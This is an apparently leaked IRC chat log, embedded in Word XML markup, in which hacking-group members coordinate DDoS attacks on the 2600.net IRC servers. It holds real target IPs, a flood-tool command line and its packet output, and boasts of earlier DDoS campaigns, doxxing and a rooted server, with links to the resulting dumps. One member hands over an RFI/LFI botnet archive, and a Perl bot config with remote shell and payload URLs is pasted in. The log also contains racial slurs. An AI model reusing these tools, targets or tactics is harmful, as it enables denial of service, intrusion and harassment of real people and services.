        </w:rPr>
        <w:br/>
        <w:t>Jun 01 04:08:14 [redacted] sure Jun 01 04:27:31 [redacted] night guiz Jun 01 04:28:32 storm night Jun 01 04:28:37 joepie92 night Jun 01 04:29:29 lol nini :) Jun 01 04:30:04 joepie92 LOL Jun 01 04:30:05 joepie92 http://www.youtube.com/watch?v=ZmUlKPthrag Jun 01 04:30:09 joepie92 look at the top comments Jun 01 04:30:23 storm im hitting efnet spoofs Jun 01 04:30:23 storm ;x Jun 01 04:30:34 storm thats how bored i bez Jun 01 04:54:33 Topiary wanna find something to hit?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05:05:45 storm sure Jun 01 05:06:01 Topiary there's shit cool site Jun 01 05:06:03 Topiary fbi.gov Jun 01 05:06:10 lol xD Jun 01 05:06:14 storm lol Jun 01 05:06:24 lol ddos ic3.gov :D Jun 01 05:06:40 storm whats with everyone wanting to hit govs Jun 01 05:06:55 storm are you really that open to just going to jail ;x Jun 01 05:07:08 storm not you you, te royal you Jun 01 05:07:10 storm the even Jun 01 05:08:21 Topiary I suppose we could piss off some IRC for lulz Jun 01 05:10:19 storm sure Jun 01 05:10:32 joepie92 does any of you Jun 01 05:10:34 joepie92 know a user called Jun 01 05:10:35 joepie92 schmoo Jun 01 05:10:41 lol nope Jun 01 05:10:42 lol :/ Jun 01 05:10:44 lol why?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:10:46 Topiary negative Jun 01 05:10:49 joepie92 I think it might be the nonynews guy Jun 01 05:10:52 joepie92 posting shit on wikia Jun 01 05:10:59 joepie92 but unsure Jun 01 05:11:02 joepie92 I've never seen him talk Jun 01 05:11:05 joepie92 he's in a lot of channels Jun 01 05:11:05 Topiary joepie92: nonynews posted on twitter that I was probably tweeting for LulzSec Jun 01 05:11:09 Topiary so yes Jun 01 05:11:10 Topiary might be Jun 01 05:11:13 joepie92 only thign Jun 01 05:11:19 joepie92 schmoo has op in propaganda Jun 01 05:11:23 joepie92 so I'm not sure how he got that Jun 01 05:11:33 joepie92 so I'd have to ask the channel founder there Jun 01 05:11:34 lol nonynews is prbs a jesterfag thinking they're being covert Jun 01 05:11:36 lol xD Jun 01 05:11:40 joepie92 nonynews also mentioned something Jun 01 05:11:42 lol best thing to do when bored Jun 01 05:11:43 joepie92 that happened in #coders Jun 01 05:11:50 joepie92 and there's only a few people there Jun 01 05:11:51 lol go to 2600 irc and just cause drama Jun 01 05:11:51 lol :D Jun 01 05:12:03 Topiary should we just go on over to 2600, flame them, and then packet it?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:12:07 joepie92 @nonyNews Jun 01 05:12:07 joepie92 nony News Jun 01 05:12:07 joepie92 Peacemaking proposes an IP-spoofing version of #LOIC for use by #Anonymous. Ingenious!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:12:09 joepie92 that was in #coders Jun 01 05:12:50 joepie92 schmoo is/was in all channels that nonynews mentions shit from it seems Jun 01 05:13:08 joepie92 @nonyNews Jun 01 05:13:08 Topiary do we still have spies in #jester?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:13:08 joepie92 nony News Jun 01 05:13:08 joepie92 &lt;lucid&gt; I think anonymous should host a free proxy server, that would be awesome - Will die laughing when @FBIPressOffice sets this one up.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:13:18 joepie92 (that was in #senloris, where schmoo is as well) Jun 01 05:13:19 joepie92 and idk Jun 01 05:13:35 Topiary we need to gather info and profile all these fags, backtrace crew/wiki crew/jester crew Jun 01 05:13:38 Topiary see where it all overlaps Jun 01 05:13:44 joepie92 Topiary, pm Jun 01 05:13:47 Topiary k Jun 01 05:13:51 storm DONT DO IT Jun 01 05:13:54 storm ITS A TRAP Jun 01 05:13:59 storm ;p Jun 01 05:14:36 Topiary it's okay he just wants to see my cock Jun 01 05:14:49 storm surprise Jun 01 05:14:51 lol is the whois a complete fake too?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:14:56 lol even the one at private whois?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:14:56 storm didnt know you had a cock Jun 01 05:16:16 storm 05:16 -!- storm [~stormeh@97-120-249- 224.ptld.qwest.net] Jun 01 05:16:17 storm 05:16 -!- ircname : stormeh Jun 01 05:16:17 storm 05:16 -!- channels : #telephreak #infoleak Jun 01 05:16:17 storm 05:16 -!- server : collective.2600.net [Arghhh, Scourge of the seven seas!] Jun 01 05:16:17 storm 05:16 -!- hostname : 97.120.249.224 Jun 01 05:16:21 storm WTF NIGGER Jun 01 05:16:35 storm get the fk off my name Jun 01 05:16:37 storm :( Jun 01 05:17:27 lol if it's not reg'd dos him off of it xD Jun 01 05:17:54 storm im gonna hit 3 ips actually Jun 01 05:17:54 storm ;p Jun 01 05:18:00 storm 05:17 djslocker.2600.net has address 173.165.207.25 Jun 01 05:18:00 storm 05:17 -!- Irssi: process 0 (host djslocker.2600.net) terminated with return Jun 01 05:18:00 storm code 0 Jun 01 05:18:00 storm 05:17 madjack.2600.net has address 216.86.158.122 Jun 01 05:18:00 storm 05:17 madjack.2600.net has IPv6 address 2607:f128:40:f00:fe31::3 Jun 01 05:18:00 storm 05:17 -!- Irssi: process 0 (host madjack.2600.net) terminated with return code 0 Jun 01 05:18:00 storm 05:17 collective.2600.net has address 208.111.35.75 Jun 01 05:18:05 lol :D Jun 01 05:18:16 lol or, lets go take over some chan on efet :D Jun 01 05:18:22 lol dos them all off :D Jun 01 05:18:25 storm lol Jun 01 05:18:29 storm either or Jun 01 05:18:30 storm ;D Jun 01 05:18:33 lol ;D Jun 01 05:18:39 * Topiary hops in iPredator VPN for the lulz and connects to 2600 Jun 01 05:18:46 storm i have too many channels on efnet Jun 01 05:18:52 lol let us do #phrack #cdej and #hackers Jun 01 05:18:59 storm | anonymous (unknown@dmvdetailing.com) (Commercial) Jun 01 05:18:59 storm : ircname : unbound by space or time.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:18:59 storm | channels : @#junkie @#malicious @#phear @#e @#syn @#jupiter @#addict @#juped Jun 01 05:18:59 storm @#geek @#overdose @#evil @#mayhem Jun 01 05:19:17 storm ;p Jun 01 05:19:52 lol or we can go to overthewire and give andrewg some shit :D Jun 01 05:21:03 Topiary sec, lemme get on something that isn't Japanese Jun 01 05:21:10 * Topiary has quit (Quit: true-story.pdf) Jun 01 05:21:20 joepie92 lol Jun 01 05:22:02 lol Whats wrong with Japan :(?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:23:42 storm godzilla lives tere Jun 01 05:23:44 storm there Jun 01 05:24:50 joepie92 I put a godzilla in your vpn so you can raep while you raep Jun 01 05:24:57 storm lol Jun 01 05:25:00 joepie92 amidoinitright?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:25:04 storm no Jun 01 05:25:23 joepie92 :( Jun 01 05:25:52 * t[2] (t@HA-vft.h6t.9puaba.IP) has joined #pure-elite Jun 01 05:26:03 storm that took forevar Jun 01 05:26:13 storm djslocker.2600.net down sons and daughters Jun 01 05:26:17 joepie92 lol Jun 01 05:26:18 * t[2] is now known as Topiary Jun 01 05:26:20 joepie92 wb Top Jun 01 05:26:29 * Topiary has quit (A TLS packet with unexpected length was received.) Jun 01 05:26:37 storm lol Jun 01 05:26:38 storm oops Jun 01 05:26:38 * Topiary (t@HA-vft.h6t.9puaba.IP) has joined #pure-elite Jun 01 05:26:45 joepie92 lol Jun 01 05:27:02 Topiary right Jun 01 05:27:07 storm Topiary Jun 01 05:27:13 storm get on 3600 Jun 01 05:27:14 storm er Jun 01 05:27:15 storm 2600 Jun 01 05:27:16 Topiary disregard two disconnects; forgot password, couldn't be bothered to type it right Jun 01 05:27:16 storm lD Jun 01 05:27:18 storm ;D Jun 01 05:27:20 Topiary okay dude Jun 01 05:27:24 Topiary I'm in Switzerland right nao :D Jun 01 05:27:30 storm hot Jun 01 05:27:31 joepie92 lolol Jun 01 05:27:44 joepie92 pm again btw :P Jun 01 05:29:18 storm 05:29 -!- |- djslocker.2600.net ---------------------- - | Users: 26 Jun 01 05:29:20 storm roflol Jun 01 05:29:26 Topiary okay I'm on Jun 01 05:29:28 Topiary where we at?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:29:31 storm ./map Jun 01 05:29:34 storm look at djs Jun 01 05:29:53 Topiary heh 30 people Jun 01 05:30:02 Topiary sec reading shit Jun 01 05:33:01 storm madjack.2600.net nao Jun 01 05:33:02 storm ;D Jun 01 05:33:32 storm 64 packets transmitted, 8 received, 87% packet loss, time 62994ms Jun 01 05:33:49 lol :D Jun 01 05:33:54 storm its nulled Jun 01 05:34:36 lol hahah Jun 01 05:34:47 storm 67 packets transmitted, 0 received, 100% packet loss, time 65992ms Jun 01 05:34:50 storm lol Jun 01 05:34:52 storm :] Jun 01 05:35:16 lol can you hit this ip 69.164.198.161 :D it's some fag on 2600 in #lulzsec we're going to take over the channel :D Jun 01 05:35:26 lol he is only person in there :D Jun 01 05:36:23 storm what server is he on Jun 01 05:36:27 storm he'll just ping out anyway Jun 01 05:37:41 lol madjack.2600.net Jun 01 05:37:53 * Topiary is on collective Jun 01 05:38:04 Topiary * [ego] (~ego@46.19.143.19): ego Jun 01 05:38:06 Topiary don't DDoS me pl0x Jun 01 05:38:11 storm madjacks dead Jun 01 05:38:15 storm so just wait for him to die Jun 01 05:39:32 storm er wait na madjacks back xD Jun 01 05:39:41 Topiary I just got disconnected from collective Jun 01 05:39:42 storm its null lasts like 5 - 6 minutes Jun 01 05:39:45 storm orly Jun 01 05:40:47 Topiary reconnected to djs Jun 01 05:40:54 storm yeah same Jun 01 05:40:54 Topiary expecting a ping on collective Jun 01 05:41:16 storm can you get a map?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:42:02 storm looks like we pissed these guys off so bad that they upped some of their boxes filtering Jun 01 05:42:11 storm lululul Jun 01 05:42:26 lol :D Jun 01 05:42:36 storm OH Jun 01 05:42:38 storm mads gone Jun 01 05:42:43 storm did that guy ping?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:43:04 Topiary yeah Jun 01 05:43:08 storm gg Jun 01 05:43:18 lol i can't even connect to 2600 xD Jun 01 05:43:22 storm lmfao Jun 01 05:43:30 storm 05:43 -!- egotistical [~ego@46.19.143.19] has joined #lulzsec Jun 01 05:43:30 storm 05:43 &lt; egotistical&gt; bitches Jun 01 05:43:32 storm ROFL Jun 01 05:43:36 storm that you?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:43:42 storm or the guy who was in there befiore Jun 01 05:43:44 storm before even Jun 01 05:43:49 Topiary it's me Jun 01 05:43:51 lol thts Topiary Jun 01 05:43:55 storm oh i c Jun 01 05:43:56 Topiary for some reason my collective shit hasn't pinged Jun 01 05:43:57 storm xD Jun 01 05:44:05 storm it will if i let off of it Jun 01 05:44:14 storm i think Jun 01 05:44:14 lol Topiary what server are you connected to?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:44:14 storm that or their ping timeouts super high Jun 01 05:44:14 Topiary djs Jun 01 05:44:19 storm djslock Jun 01 05:44:20 Topiary should be 240 secs Jun 01 05:44:21 lol .net?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:44:24 storm ya Jun 01 05:44:37 Topiary * djslocker.2600.net ------------------------------- | Users: 111 (63.4%) Jun 01 05:44:37 Topiary * '- blackbeard.2600.net -------------------------- | Users: 0 (0.0%) Jun 01 05:44:37 Topiary * |- collective.2600.net ---------------------- | Users: 55 (31.4%) Jun 01 05:44:37 Topiary * '- services.2600.net ------------------------ | Users: 9 (5.1% Jun 01 05:44:44 Topiary these guys are so fun to fuck Jun 01 05:45:01 storm dont worry djs is next Jun 01 05:45:02 storm &gt;:LD Jun 01 05:45:04 storm &gt;:D Jun 01 05:45:27 lol wait :D let us troll the shit out of them first :D Jun 01 05:45:50 lol then we can PUSH/SYN/ACK/UDP them to oblivion hahahahahahaha Jun 01 05:45:57 storm ewwwwwwwww Jun 01 05:46:00 storm YOU SAID UDP Jun 01 05:46:02 storm !!!!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:46:04 lol :o Jun 01 05:46:06 storm i am using urg Jun 01 05:46:09 storm atm Jun 01 05:46:17 lol UDP is ok, if you hit ports at rand Jun 01 05:46:22 storm well Jun 01 05:46:30 storm i had access to these great britian boxes Jun 01 05:46:32 storm those + udp Jun 01 05:46:34 storm were sexy Jun 01 05:47:03 lol i used to load about 8,000 RFI with usp flooder crushed most server :D Jun 01 05:47:09 lol udp* Jun 01 05:47:16 lol it used to hit ports at random Jun 01 05:47:17 lol :D Jun 01 05:47:35 Topiary I imagine it would Jun 01 05:48:09 lol i ddos'd enturbulation.org, whyweprotest, anonnet for about 3 week with it all :DDDDD Jun 01 05:48:18 storm haha Jun 01 05:48:22 Topiary ahaha that was you?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:48:24 storm i only use TCP Jun 01 05:48:26 lol yes :D Jun 01 05:48:31 Topiary Gregg Housh was bitching about that Jun 01 05:48:42 lol alot of people we're bitching about it Jun 01 05:48:48 lol let me show you Jun 01 05:49:01 lol i dont care if this USB infects me because it's funny to show you this :D Jun 01 05:49:39 storm Flood completed, 41784641 packets sent, 75 seconds, 557128 packets/sec Jun 01 05:49:42 storm nulled madjack Jun 01 05:49:45 storm again Jun 01 05:50:47 lol it's actually not infected :D Jun 01 05:51:13 storm yay Jun 01 05:51:15 * joepie92 remembers an UDP flood on this home IP Jun 01 05:51:23 storm [05:51] [storm__(+i)] [2:djslocker/#lulzsec(+nt)] [Lag: 51 (??)] Jun 01 05:51:23 Topiary pretty sure I just pinged from djs Jun 01 05:51:25 lol storm would you also like the RFI/LFI bot with google bypass i was talking about while i have this plugged in?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:51:29 storm rofl Jun 01 05:51:31 storm Topiary Jun 01 05:51:32 storm &lt;3 Jun 01 05:51:39 storm yes Jun 01 05:51:43 storm i would kayla Jun 01 05:51:44 storm :) Jun 01 05:51:44 joepie92 a while ago I had ~20 shared hosting servers UDP flooding my modem...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:51:53 joepie92 not sure how it didn't melt Jun 01 05:52:07 storm Sending packets of size 40....x 208.111.35.75 218.108.235.225 6667 0 20 0 Jun 01 05:52:13 storm [root@node1(~/opt/.local)]#./nsdapx 173.165.207.25 0 6667 0 20 0 Jun 01 05:52:16 storm both at same time Jun 01 05:52:17 storm lol Jun 01 05:52:20 lol i dont know if the bypass will still work it is a old bot :D Jun 01 05:52:21 Topiary welp, they're fucked Jun 01 05:52:25 lol but we will see :D Jun 01 05:52:26 storm and madjacks nulled Jun 01 05:52:26 storm dude Jun 01 05:52:34 storm theyre not gonna have anywhere to chatr Jun 01 05:52:36 storm chat* Jun 01 05:52:37 Topiary by the way, they think we're firing botnets that can only keep it down for 10 mins at a time Jun 01 05:52:46 storm lol Jun 01 05:52:50 storm theyre retarded Jun 01 05:52:51 storm xD Jun 01 05:53:08 Topiary okay so everything is down? madjack nulled, collective out, djs out, what about blackbeard?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:53:14 storm 05:52 -!- bottle_of_rum [~bottle_of@189-39-145- 108.gru.flash.tv.br] has quit Jun 01 05:53:14 storm [Ping timeout: 240 seconds] Jun 01 05:53:16 storm LOL Jun 01 05:53:29 storm [Lag: 176 (??)] Jun 01 05:53:38 Topiary mine's about to go if it hasn't already Jun 01 05:53:51 storm 05:53 -!- ego [~ego@46.19.143.19] has quit [Ping timeout: 240 seconds] Jun 01 05:53:52 storm did Jun 01 05:54:04 storm [Lag: 211 (??)] Jun 01 05:54:06 Topiary * Connecting to irc.2600.net (94.125.252.114) port 6667...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:54:06 Topiary * Connecting to irc.2600.net (173.165.207.25) port 6667...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 05:54:08 Topiary failed Jun 01 05:54:11 storm :D Jun 01 05:54:21 Topiary oh shit I'm in on 173 Jun 01 05:54:22 storm 05:54 -!- ERROR Closing Link: c-68-56-76- 36.hsd1.fl.comcast.net (Ping timeout: Jun 01 05:54:22 storm 240 seconds) Jun 01 05:54:22 storm 05:54 -!- Irssi: Connection lost to djslocker.2600.net Jun 01 05:54:22 storm 05:54 -!- Irssi: Removed reconnection to server djslocker.2600.net port 6667 Jun 01 05:54:22 storm 05:54 -!- Irssi: Looking up djslocker.2600.net Jun 01 05:54:22 storm 05:54 -!- Irssi: Reconnecting to djslocker.2600.net [173.165.207.25] port 6667 Jun 01 05:54:22 storm - use /RMRECONNS to abort Jun 01 05:54:24 Topiary slooooowly Jun 01 05:54:41 storm i let off Jun 01 05:54:44 storm wanna check users Jun 01 05:54:45 storm ;x Jun 01 05:54:47 Topiary * collective.2600.net ------------------------------ | Users: 114 (30.2%) Jun 01 05:54:47 Topiary * '- blackbeard.2600.net -------------------------- | Users: 0 (0.0%) Jun 01 05:54:48 Topiary * |- madjack.2600.net ------------------------- | Users: 132 (35.0%) Jun 01 05:54:48 Topiary * |- djslocker.2600.net ----------------------- | Users: 122 (32.4%) Jun 01 05:54:48 Topiary * '- services.2600.net ------------------------ | Users: 9 (2.4% Jun 01 05:55:06 storm 05:54 -!- djslocker.2600.net ------------------------- ------ | Users: 95 Jun 01 05:55:06 storm (29.3%) Jun 01 05:55:06 storm 05:54 -!- '- blackbeard.2600.net --------------------- ----- | Users: 0 Jun 01 05:55:06 storm (0.0%) Jun 01 05:55:06 storm 05:54 -!- |- madjack.2600.net ------------------------ - | Users: 132 Jun 01 05:55:06 storm (40.7%) Jun 01 05:55:06 storm 05:54 -!- |- collective.2600.net --------------------- - | Users: 88 Jun 01 05:55:06 storm (27.2%) Jun 01 05:55:06 storm 05:54 -!- '- services.2600.net ----------------------- - | Users: 9 Jun 01 05:55:09 storm you're off Jun 01 05:55:11 storm i think Jun 01 05:55:47 Topiary still going strong Jun 01 05:55:49 storm madjacks done Jun 01 05:56:36 Topiary * bottle_of_rum has quit (Ping timeout: 240 seconds) Jun 01 05:56:36 Topiary * ego has quit (Ping timeout: 240 seconds) Jun 01 05:56:37 Topiary * storm__ has quit (Ping timeout: 240 seconds Jun 01 05:56:37 Topiary LOL Jun 01 05:56:43 storm lolol Jun 01 05:57:48 lol Topiary: So yeh, the thing with anonnet, entub, whywe protest all started because my friend C ddos'd anonnet and i got the blame for it, genome was ranting at me for ages saying my ddos was pathetic when it wasn't even me who ddos'd him Jun 01 05:57:59 lol so i thought "fuck it, ill show you ddos" Jun 01 05:58:11 lol kept enturb, wwp, anonnet down for 3 weeks Jun 01 05:58:14 Topiary good idea Jun 01 05:58:23 lol then genome was demanding my dox Jun 01 05:58:26 lol so i dox'd him Jun 01 05:58:29 lol see this Jun 01 05:58:52 lol http://www.aminsb.org/administrator/sec/lols/genome.txt Jun 01 05:59:05 lol he raged like fuck for ages Jun 01 05:59:11 lol threatening all kinds Jun 01 05:59:14 lol so i did this Jun 01 05:59:30 lol http://www.aminsb.org/administrator/sec/lols/anonnet.txt Jun 01 05:59:35 lol rooted tht shit :D Jun 01 05:59:48 lol after tht he p much gave up :D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06:00:04 Topiary * collective.2600.net ------------------------------ | Users: 152 (55.1%) Jun 01 06:00:06 Topiary * '- blackbeard.2600.net -------------------------- | Users: 0 (0.0%) Jun 01 06:00:08 Topiary * |- djslocker.2600.net ----------------------- | Users: 115 (41.7%) Jun 01 06:00:10 Topiary * '- services.2600.net ------------------------ | Users: 9 (3.3%) Jun 01 06:00:11 storm lol Jun 01 06:00:12 Topiary ruh roh, madjack's gone Jun 01 06:00:14 storm XD Jun 01 06:01:53 Topiary let's just let 'em up and troll under different types of weather Jun 01 06:01:56 Topiary you be storm, I be whirlpool Jun 01 06:01:59 Topiary kayla be tornado Jun 01 06:02:18 storm xD Jun 01 06:02:25 joepie92 ... a whirlpool isn't weather?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 06:02:31 storm LMFAO Jun 01 06:02:46 Topiary YES IT IS JOEPIE Jun 01 06:02:54 joepie92 lolno Jun 01 06:02:54 Topiary GOSH JOEPIE Jun 01 06:03:10 joepie92 lolno it r not Jun 01 06:03:30 Topiary okay, let's troll under names of natural disasters Jun 01 06:03:32 Topiary you be storm Jun 01 06:03:35 Topiary I be whirlpool Jun 01 06:03:38 Topiary joepie be joepie Jun 01 06:03:38 storm lmao Jun 01 06:03:40 Topiary &gt;:[ Jun 01 06:03:42 joepie92 LOL Jun 01 06:03:50 joepie92 also a whirlpool is not a natural disaster Jun 01 06:03:56 Topiary listen bro Jun 01 06:04:01 Topiary I've seen PotC 3 Jun 01 06:04:06 joepie92 "natural occurences" would probably be more accurate Jun 01 06:04:06 joepie92 :) Jun 01 06:04:07 Topiary and that thing fucks shit up Jun 01 06:04:12 joepie92 occurrences*?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 06:04:15 joepie92 herpderpenglish Jun 01 06:04:19 lol storm: http://www.aminsb.org/administrator/sec/lols/d0ngs.rar Jun 01 06:04:22 lol tht bot :D Jun 01 06:04:29 joepie92 A whirlpool is a swirling body of water usually produced by ocean tides. The vast majority of whirlpools are not very powerful. More powerful ones are more properly termed maelstroms. Vortex is the proper term for any whirlpool that has a downdraft. Very small whirlpools can easily be seen when a bath or a sink is draining, but these are produced in a very different manner from those in nature. Smaller whirlpools Jun 01 06:04:30 joepie92 also appear at the base of many waterfalls.[1] In the case of powerful waterfalls, like Niagara Falls, these whirlpools can be quite strong. The most powerful whirlpools are created in narrow shallow straits with fast flowing water.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 06:04:32 storm tyty Jun 01 06:04:54 lol you need to set all the files up on a server Jun 01 06:05:04 storm lol im already wgetting it somewhere Jun 01 06:05:09 Topiary &gt;whirlpool is now known as maelstrom Jun 01 06:05:20 joepie92 lol Jun 01 06:05:26 Topiary &gt;enemy ship is now known as driftwood Jun 01 06:05:30 lol liek the shell, phpbot if you want it to spread and the perl bot to spread and the id's aswell as the google.php thts the google bypas but i dont know if the google bypass still works Jun 01 06:05:31 joepie92 ahahaha Jun 01 06:06:06 lol ##[ KONFIGURASI URL ]## Jun 01 06:06:06 lol my $fx29id = "http://reichenthal.at/pages/s/idxx.txt????"; #Fx29ID (Simple) / (Advanced) Jun 01 06:06:06 lol my $fx29id2 = "http://reichenthal.at/pages/s/id2.txt????"; #Fx29ID (Advanced) Jun 01 06:06:07 lol my $fx29sh = "http://reichenthal.at/pages/s/sh.txt????"; #Fx29Sh (Optional) Jun 01 06:06:07 lol my $bypass = "http://reichenthal.at/pages/s/google.php"; #Google Bypasserz (Optional) Jun 01 06:06:26 joepie92 &gt;enemy is now known as drowning man Jun 01 06:06:39 storm 06:03 -!- Irssi: Connection to collective.2600.net established Jun 01 06:06:39 storm 06:03 !collective.2600.net * * * Looking up your hostname...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 01 06:06:39 storm 06:03 !collective.2600.net * * * Checking Ident Jun 01 06:06:39 storm 06:03 !collective.2600.net * * * No Ident response Jun 01 06:06:39 storm 06:04 !collective.2600.net * * * Found your hostname Jun 01 06:06:39 storm 06:04 -!- ERROR Closing Link: c-68-56-76- 36.hsd1.fl.comcast.net (Registration Jun 01 06:06:39 storm timed out) Jun 01 06:06:53 storm 06:06 -!- Irssi: Looking up djslocker.2600.net Jun 01 06:06:53 storm 06:06 -!- Irssi: Connecting to djslocker.2600.net [173.165.207.25] port 6667 Jun 01 06:07:14 storm madjacks back Jun 01 06:07:19 lol storm: you got the file so i can delete it?</w:t>
      </w:r>
